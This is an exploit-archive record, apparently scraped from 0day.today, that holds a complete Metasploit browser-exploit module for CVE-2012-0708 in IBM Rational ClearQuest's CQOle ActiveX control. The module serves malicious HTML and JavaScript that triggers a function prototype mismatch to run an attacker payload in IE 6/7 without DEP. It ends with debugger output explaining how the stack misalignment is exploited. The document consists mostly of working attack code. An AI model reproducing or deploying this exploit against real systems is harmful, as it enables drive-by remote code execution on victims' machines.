Description
Exploit for windows platform in category remote exploits
{"id": "1337DAY-ID-18917", "type": "zdt", "bulletinFamily": "exploit", "title": "IBM Rational ClearQuest CQOle Remote Code Execution", "description": "Exploit for windows platform in category remote exploits", "published": "2012-07-04T00:00:00", "modified": "2012-07-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/18917", "reporter": "rgod", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-14T13:53:56", "viewCount": 7, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-0708"]}]}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/18917", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"7.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :classid => \"{94773112-72E8-11D0-A42E-00A024DED613}\",\r\n :method => \"RegisterSchemaRepoFromFileByDbSet\",\r\n :rank => NormalRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"IBM Rational ClearQuest CQOle Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a function prototype mismatch on the CQOle ActiveX\r\n control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which\r\n allows reliable remote code execution when DEP isn't enabled.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Andrea Micalizzi aka rgod', # Vulnerability discovery\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-0708' ],\r\n [ 'BID', '53170' ],\r\n [ 'OSVDB', '81443'],\r\n [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ],\r\n [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # cqole.dll 7.1100.0.150\r\n [ 'Automatic', {} ],\r\n [ 'IE 6 / IE7 (No DEP)', {} ], # Because of the nature of the vulnerability no DEP is a requisite\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"May 19 2012\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\r\n return targets[1] #IE 6 on Windows XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\r\n return targets[1] #IE 7 on Windows XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7/\r\n return targets[1] #IE 7 on Windows Vista\r\n else\r\n return nil\r\n end\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n my_target = get_target(agent)\r\n\r\n # Avoid the attack if the victim doesn't have the same setup we're targeting\r\n if my_target.nil?\r\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch))\r\n object_id = rand_text_alpha(rand(8) + 4)\r\n dbset_value = rand_text_alpha(rand(8) + 4)\r\n var_payload = rand_text_alpha(rand(8) + 4)\r\n\r\n html = <<-EOS\r\n <html>\r\n <body>\r\n <object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object>\r\n <script language=\"JavaScript\">\r\n var #{var_payload} = unescape(\"#{js_code}\")\r\n #{object_id}.RegisterSchemaRepoFromFileByDbSet(\"#{dbset_value}\", #{var_payload});\r\n </script>\r\n </body>\r\n </html>\r\n EOS\r\n\r\n html = html.gsub(/^\\t\\t/, '')\r\n\r\n print_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\n* RegisterSchemaRepoFromFile and no RegisterSchemaRepoFromFileByDbSet is called:\r\n\r\nBreakpoint 0 hit\r\neax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c\r\neip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\r\nMFC80U!_AfxDispatchCall+0xe:\r\n78371062 ffd0 call eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)}\r\n\r\n* RegisterSchemaRepoFromFile prototype (it is going to be executed):\r\n\r\n.text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *)\r\n\r\nhis ret is: retn 4\r\n\r\n* RegisterSchemaRepoFromFileByDbSet prototype (it should be executed):\r\n\r\n.text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *)\r\n\r\nhis ret is: retn 8\r\n\r\n* When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall it is what happens:\r\n\r\n0:000> p\r\neax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c\r\neip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\r\nMFC80U!_AfxDispatchCall+0x10:\r\n78371064 c3 ret\r\n0:000> dd esp\r\n0013e208 001dcff4 7835f5d2 fffffffe 78336a3a\r\n\r\nESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and no to the stored EIP on\r\nthe stack. The ret from MFC80U!_AfxDispatchCall allows to get control on a reliable way when DEP is\r\ndisabled\r\n\r\n=end\r\n\r\n\n\n# 0day.today [2018-04-14] #", "_state": {"dependencies": 1647589307, "score": 1659703426, "epss": 1678812679}}
{}
IBM Rational ClearQuest CQOle Remote Code Execution